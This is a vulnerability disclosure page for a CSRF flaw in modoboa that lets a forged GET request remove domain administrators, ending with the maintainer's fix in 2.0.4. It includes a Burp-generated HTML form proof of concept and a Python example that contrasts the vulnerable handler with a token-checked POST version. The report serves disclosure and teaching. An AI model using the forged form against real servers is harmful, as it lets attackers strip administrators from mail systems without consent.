CSRF leading to removal of Administrator users in modoboa/modoboa

Valid

Reported on

Jan 21st 2023


Description

The remove function is vulnerable to CSRF, which lets an attacker remove any Administrator user via a single GET request: GET /admin/permissions/remove/?domid=2&daid=15

Proof of Concept

1/ Visit /admin/domains/1/

2/ The delete button that removes a permission is vulnerable to CSRF (screenshot below)

https://drive.google.com/file/d/1fs_2MID6uT_f7rvjJQYK_m-e6q39PMez/view?usp=sharing

3/ Open the PoC page below; changing the domid and daid values removes the administrator user with that id

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://127.0.0.1/admin/permissions/remove/">
      <input type="hidden" name="domid" value="2" />
      <input type="hidden" name="daid" value="15" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
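The PoC works because the endpoint changes state on a GET request that carries nothing the attacker cannot predict: the browser attaches the victim's session cookie, and the two parameters are guessable. The added example below (not modoboa's code and not the fix in the linked PR; plain Python with no framework, hypothetical names, constructed data) places that vulnerable pattern beside a protected version that accepts the action only over POST with a per-session CSRF token, and replays the forged request against both.

```python
"""Added example: a state-changing GET handler with no CSRF protection beside a
hardened POST handler that checks a per-session token. Constructed, not modoboa's code."""
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    """Minimal stand-in for an HTTP request as a view sees it (constructed)."""
    method: str
    params: dict = field(default_factory=dict)   # query string or form body
    session: dict = field(default_factory=dict)  # server-side session tied to the cookie


class DomainAdmins:
    """Constructed store: domain id -> set of administrator ids."""
    def __init__(self):
        self.admins = {2: {15, 16}}

    def remove(self, domid: int, daid: int) -> bool:
        members = self.admins.get(domid, set())
        if daid in members:
            members.discard(daid)
            return True
        return False


def vulnerable_remove(store: DomainAdmins, req: Request) -> int:
    """Mirrors the reported endpoint: any request carrying domid/daid removes the
    administrator. No method restriction and no token, so a cross-site page can
    trigger it because the browser sends the victim's cookie automatically."""
    if "domid" not in req.params or "daid" not in req.params:
        return 400
    store.remove(int(req.params["domid"]), int(req.params["daid"]))
    return 200


def issue_csrf_token(session: dict) -> str:
    """Per-session secret that the legitimate page embeds in its delete form."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def hardened_remove(store: DomainAdmins, req: Request) -> int:
    """Same action, protected: state changes only over POST, and only when the
    submitted token matches the session's token (constant-time comparison)."""
    if req.method != "POST":
        return 405
    expected = req.session.get("csrf_token")
    supplied = req.params.get("csrf_token")
    if not expected or not supplied or not hmac.compare_digest(expected, supplied):
        return 403
    if "domid" not in req.params or "daid" not in req.params:
        return 400
    store.remove(int(req.params["domid"]), int(req.params["daid"]))
    return 200


def simulate() -> dict:
    """Replays the PoC's forged request against both handlers, then a guessed
    token and a legitimate form submission against the hardened one.
    Each result is (status, administrator 15 still present)."""
    session = {}  # the victim's logged-in session, attached by the browser
    forged = Request("GET", {"domid": "2", "daid": "15"}, session)

    store = DomainAdmins()
    forged_vs_vulnerable = (vulnerable_remove(store, forged), 15 in store.admins[2])

    store = DomainAdmins()
    forged_vs_hardened = (hardened_remove(store, forged), 15 in store.admins[2])

    # A cross-site page cannot read the token out of the victim's session,
    # so even a POST with a guessed value is rejected.
    token = issue_csrf_token(session)
    store = DomainAdmins()
    guessed = Request("POST", {"domid": "2", "daid": "15", "csrf_token": "0" * 64}, session)
    guessed_vs_hardened = (hardened_remove(store, guessed), 15 in store.admins[2])

    store = DomainAdmins()
    legit = Request("POST", {"domid": "2", "daid": "15", "csrf_token": token}, session)
    legit_vs_hardened = (hardened_remove(store, legit), 15 in store.admins[2])

    return {
        "forged_vs_vulnerable": forged_vs_vulnerable,
        "forged_vs_hardened": forged_vs_hardened,
        "guessed_vs_hardened": guessed_vs_hardened,
        "legit_vs_hardened": legit_vs_hardened,
    }


if __name__ == "__main__":
    for name, outcome in simulate().items():
        print(f"{name}: status={outcome[0]}, admin 15 still present={outcome[1]}")
```

The forged GET succeeds against the vulnerable handler and the administrator disappears; against the hardened handler it is refused on method alone, and a forged POST is refused on the token. In a framework such as Django this check is normally supplied by the CSRF middleware rather than written by hand, but the two conditions it enforces are the ones shown here.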

Reference

Reports with the same root cause, deleting an administrator user through an unprotected request, in:

https://huntr.dev/bounties/0a852351-00ed-44d2-a650-9055b7beed58/

https://huntr.dev/bounties/d7007f76-3dbc-48a7-a2fb-377040fe100c/

Impact

Allows an attacker to induce logged-in users to perform actions that they do not intend to perform.

Occurrences

We are processing your report and will contact the modoboa team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
0ozero0 modified the report a year ago
0ozero0 modified the report a year ago
We have contacted a member of the modoboa team and are waiting to hear back a year ago
modoboa/modoboa maintainer validated this vulnerability a year ago
0ozero0 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
modoboa/modoboa maintainer (Maintainer), a year ago:

Here is a fix: https://github.com/modoboa/modoboa/pull/2758

0ozero0 (Researcher), a year ago:

Hi @maintainer Yes, looks fixed.

modoboa/modoboa maintainer marked this as fixed in 2.0.4 with commit 38d778 a year ago
The fix bounty has been dropped
This vulnerability has now been published a year ago
domain.py#L2 has been validated